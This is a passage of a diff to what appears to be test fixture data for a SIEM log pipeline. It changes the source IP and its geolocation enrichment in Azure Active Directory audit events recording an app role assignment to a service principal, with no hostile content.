/manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124987500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5471,25 +4985,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -5503,7 +4999,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -5639,7 +5135,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -5651,12 +5147,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036237100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124994100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -5682,25 +5178,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -5714,7 +5192,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -5850,7 +5328,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -5862,12 +5340,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036243800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b5